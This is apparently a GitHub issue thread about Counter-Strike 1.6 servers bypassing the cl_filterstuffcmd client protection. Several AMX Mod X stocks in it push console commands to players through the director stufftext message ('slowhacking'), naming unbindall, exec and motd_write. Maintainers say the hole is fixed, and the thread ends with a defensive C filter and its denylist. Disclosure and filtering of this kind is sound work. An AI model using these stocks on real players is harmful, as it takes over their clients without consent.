Halflife: cl_filterstuffcmd has been bypassed by servers

Created on 6 Feb 2020 · 15 Comments · Source: ValveSoftware/halflife

Counter-Strike 1.6 servers can bypass any slowhacking protection by a specified message towards the client. The following code basically is an AMX Mod X stock which can be used to slowhack:

stock SendCmd_1( id , text[] ) {
    message_begin( MSG_ONE, 51, _, id )
    write_byte( strlen(text) + 2 )
    write_byte( 10 )
    write_string( text )
    message_end()
}

Would be nice, if servers wouldn't be able to write anything into game files...

All 15 comments

Have you personally checked this with the latest version of the game client? This method was fixed almost a year ago in spring updates.

Yes I have, currently I'm checking over it again, but it runs commands on client side, even with cl_filterstuffcmd 3.

Cvar cl_filterstuffcmd has only two values 0 and 1. What commands, for example? Perhaps these commands are not in the list, because cl_filterstuffcmd has a list of blocked cvars/cmds, it does not block all cvars/cmds.

Point taken, but I can send unbindall, exec, motd_write for some examples.

So I guess, this can be solved, if servers cannot send any commands at all.

The motd_write command was fixed a long time ago and cannot write any files via client console. It is also in list of blocked cmds.

The commands exec and unbindall also cannot be executed remotely in the client console.

I just checked all this on the latest version of the client, are you definitely using this?:

] version
Protocol version 48
Exe version 1.1.2.7/Stdio (cstrike)
Exe build: 15:17:55 Jul 24 2019 (8308)

Fixing such problems is necessary primarily on the client side, because the server side can always be patched and forced to send the necessary data.

DRC_CMD_STUFFTEXT is filtered through pfnFilteredClientCmd().

Your client is outdated maybe.

My issue is still with similar code... I have reverse engineered a plugin, and it had this stock (if I did it correctly)

public client_e2(id, String:text[])
{
    if (is_user_connected(id))
    {
        message_begin(MSG_ONE, SVC_DIRECTOR, 176, id);
        write_byte(strlen(text) + 2);
        write_byte(10);
        write_string(text);
        message_end();
    }
    return 0;
}

As far as I'm concerned, this still allows some commands to be run, but tell me if I'm wrong.

On what version did you test it?

:/

it's impossible, attach the plugin :/

Which game are you testing this with?

?

Counter-Strike 1.6 servers can bypass

This does not work anymore.

stock client_cmd_ex(id, const command[], any:...)
{
    #pragma unused command

    if (id == 0 || is_user_connected(id))
    {
        new szMessage[256]

        format_args(szMessage, charsmax(szMessage), 1)

        message_begin(id == 0 ? MSG_ALL : MSG_ONE, 51, _, id)
        write_byte(strlen(szMessage) + 2)
        write_byte(10)
        write_string(szMessage)
        message_end()
    }
}

#pragma unused command x D

#pragma unused command x D

You aren’t reading are you?

client_cmd_ex(id, const command[], any:...)
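
The client-side filtering discussed in this thread, sketched as an added example (not code from the thread, from AMX Mod X, or from Valve's client): it validates the length byte that the stocks write as strlen(text) + 2, then checks every `;`- or newline-separated command against a denylist. The function names, return codes and the three-entry denylist (only the commands named in the thread) are assumptions.

```c
#include <stdio.h>
#include <string.h>
#include <strings.h>
#define DRC_CMD_STUFFTEXT 10  /* the write_byte(10) in the stocks above */

/* Constructed denylist: only the commands named in this thread. */
static const char *const DENY[] = { "exec", "unbindall", "motd_write" };

/* Returns 1 if a single command (separators already split off) may run. */
static int command_allowed(const char *cmd, size_t len)
{
    size_t n = 0, i;
    while (len && strchr(" \t\"", *cmd)) { cmd++; len--; }  /* skip padding */
    while (n < len && !strchr(" \t\"", cmd[n])) n++;         /* command name */
    for (i = 0; i < sizeof DENY / sizeof *DENY; i++)
        if (strlen(DENY[i]) == n && strncasecmp(cmd, DENY[i], n) == 0)
            return 0;                                        /* case-insensitive hit */
    return 1;
}

/* Splits on every ';' and newline, even inside quotes: that over-splits,
 * so a denylisted word hidden in a quoted argument is blocked too. */
static int stufftext_allowed(const char *text)
{
    for (;;) {
        size_t len = strcspn(text, ";\r\n");
        if (!command_allowed(text, len)) return 0;
        if (text[len] == '\0') return 1;
        text += len + 1;
    }
}

/* buf = [length][sub-command][text + NUL]; length counts the bytes after it.
 * Returns 1 = pass on, 0 = drop, -1 = malformed. */
int filter_director_payload(const unsigned char *buf, size_t buflen)
{
    size_t declared = buflen >= 3 ? buf[0] : 0;
    if (declared < 2 || declared > buflen - 1) return -1;
    if (buf[1] != DRC_CMD_STUFFTEXT) return 1;  /* other sub-commands: out of scope */
    if (memchr(buf + 2, 0, declared - 1) != buf + declared) return -1; /* NUL must be last */
    return stufftext_allowed((const char *)buf + 2);
}

int main(void)
{
    static const unsigned char ok[]  = "\x09\x0a" "echo hi";           /* constructed */
    static const unsigned char bad[] = "\x13\x0a" "echo a;EXEC x.cfg"; /* constructed */
    printf("ok=%d bad=%d\n", filter_director_payload(ok, sizeof ok),
           filter_director_payload(bad, sizeof bad));
    return 0;
}
```

A denylist only covers what is on it, which is the limitation raised earlier in the thread about cl_filterstuffcmd not blocking all cvars/cmds.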
